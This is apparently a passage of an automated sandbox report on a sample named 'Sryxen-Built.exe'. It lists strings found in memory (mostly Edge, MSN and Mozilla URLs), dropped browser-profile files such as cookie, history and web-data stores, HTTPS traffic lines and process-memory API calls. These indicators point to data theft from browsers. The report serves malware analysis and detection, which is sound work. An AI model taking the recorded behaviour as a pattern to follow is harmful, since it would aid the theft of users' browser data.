Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: HubApps Icons.6.dr, f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: HubApps Icons.6.dr, f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: HubApps Icons.6.dr, f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://gaana.com/
Source: 8uliCbB.db.0.drString found in binary or memory: https://gemini.google.com/app?q=
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 2cc80dabc69f58b6_1.6.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
Source: 2cc80dabc69f58b6_1.6.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://m.kugou.com/
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://m.soundcloud.com/
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://m.vk.com/
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: Cookies.7.drString found in binary or memory: https://msn.comXID/
Source: Cookies.7.drString found in binary or memory: https://msn.comXIDv10
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://music.amazon.com
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://music.apple.com
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://music.yandex.com
Source: 2cc80dabc69f58b6_1.6.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
Source: 000003.log5.6.dr, 2cc80dabc69f58b6_0.6.drString found in binary or memory: https://ntp.msn.com
Source: 000003.log.6.drString found in binary or memory: https://ntp.msn.com/
Source: 000003.log.6.drString found in binary or memory: https://ntp.msn.com/0
Source: QuotaManager.6.drString found in binary or memory: https://ntp.msn.com/_default
Source: 000003.log.6.dr, 2cc80dabc69f58b6_1.6.drString found in binary or memory: https://ntp.msn.com/edge/ntp
Source: 2cc80dabc69f58b6_1.6.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: Session_13385951551391722.6.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: QuotaManager.6.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
Source: 2cc80dabc69f58b6_0.6.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://open.spotify.com
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://outlook.live.com/mail/0/
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://outlook.office.com/mail/0/
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: 2cc80dabc69f58b6_1.6.drString found in binary or memory: https://sb.scorecardresearch.com/
Source: Sryxen-Built.exeString found in binary or memory: https://sectigo.com/CPS0
Source: 2cc80dabc69f58b6_1.6.drString found in binary or memory: https://srtb.msn.cn/
Source: 2cc80dabc69f58b6_1.6.drString found in binary or memory: https://srtb.msn.com/
Source: C6DPeS7.db.0.drString found in binary or memory: https://support.mozilla.org
Source: C6DPeS7.db.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: C6DPeS7.db.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://tidal.com/
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://twitter.com/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.6.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.6.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.6.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://vibe.naver.com/today
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://web.telegram.org/
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://web.whatsapp.com
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.deezer.com/
Source: Sryxen-Built.exe, 00000000.00000003.1331742804.00000273002B8000.00000004.00000020.00020000.00000000.sdmp, 8uliCbB.db.0.drString found in binary or memory: https://www.ecosia.org/newtab/v20
Source: content.js.6.dr, content_new.js.6.drString found in binary or memory: https://www.google.com/chrome
Source: Sryxen-Built.exe, 00000000.00000003.1331742804.00000273002B8000.00000004.00000020.00020000.00000000.sdmp, 8uliCbB.db.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: Web Data.6.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.iheart.com/podcast/
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.instagram.com
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.last.fm/
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.messenger.com
Source: C6DPeS7.db.0.drString found in binary or memory: https://www.mozilla.org
Source: C6DPeS7.db.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: C6DPeS7.db.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: history.txt.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: Sryxen-Built.exe, 00000000.00000003.1331072733.0000027301F70000.00000004.00000020.00020000.00000000.sdmp, p2xLIfH.db.0.dr, C6DPeS7.db.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: C6DPeS7.db.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Sryxen-Built.exe, 00000000.00000003.1331072733.0000027301F70000.00000004.00000020.00020000.00000000.sdmp, p2xLIfH.db.0.dr, C6DPeS7.db.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 2cc80dabc69f58b6_1.6.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.office.com
Source: Top Sites.6.drString found in binary or memory: https://www.office.com/
Source: Top Sites.6.drString found in binary or memory: https://www.office.com/Office
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.tiktok.com/
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://www.youtube.com
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://y.music.163.com/m/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F63C4870 LoadLibraryW,GetProcAddress,NtQueryInformationProcess,ReadProcessMemory,0_2_00007FF6F63C4870
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F63872800_2_00007FF6F6387280
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F63B68000_2_00007FF6F63B6800
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F649A8C00_2_00007FF6F649A8C0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F63567300_2_00007FF6F6356730
